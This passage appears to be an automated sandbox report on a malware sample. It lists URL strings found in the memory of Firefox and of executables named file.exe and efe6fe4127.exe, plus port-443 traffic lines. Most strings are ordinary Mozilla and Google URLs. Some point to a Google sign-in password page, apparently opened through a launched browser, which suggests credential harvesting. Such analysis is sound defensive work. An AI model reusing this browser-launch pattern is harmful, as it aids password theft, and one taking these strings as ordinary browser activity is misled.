Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userABOUT_SPONSORED_TOP_SITES
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userABOUT_SPONSORED_TOP_SITEStopsites
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-user-removal
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpresource://devtools/
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000002E.00000003.2981512771.0000020F2FD38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://svgwg.org/svg2-draft/struct.html#SymbolNotes:
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000002E.00000003.2995577212.0000020F30A5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2993870594.0000020F30A5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-west-first-party-cookies).
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000002E.00000003.3019945426.0000020F30AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.certificate-transparency.org/what-is-ct
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000002E.00000003.3053296794.0000020F385DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3057332282.0000020F38638000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3057057500.0000020F38627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056466204.0000020F30A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000002E.00000003.3056466204.0000020F30A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search#didSettingsMetaDataUpdate
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: file.exe, 00000000.00000003.2193511222.000000000530D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2680343152.0000000005725000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2846546783.00000000061EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2193511222.000000000530D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2680343152.0000000005725000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 0000002E.00000003.3060467793.0000020F3AC5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/US
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 0000001C.00000002.2930946278.0000012157290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://ac
Source: firefox.exe, 00000021.00000002.2936072675.0000029B41DE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://ac8
Source: firefox.exe, 0000002D.00000002.2975821570.0000014898280000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.2819634150.000001271015F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2826679154.00000167E023B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.2975821570.000001489828B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 0000001C.00000002.2931287187.00000121572A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2930946278.0000012157294000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2930456761.0000029B41A40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2936072675.0000029B41DE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
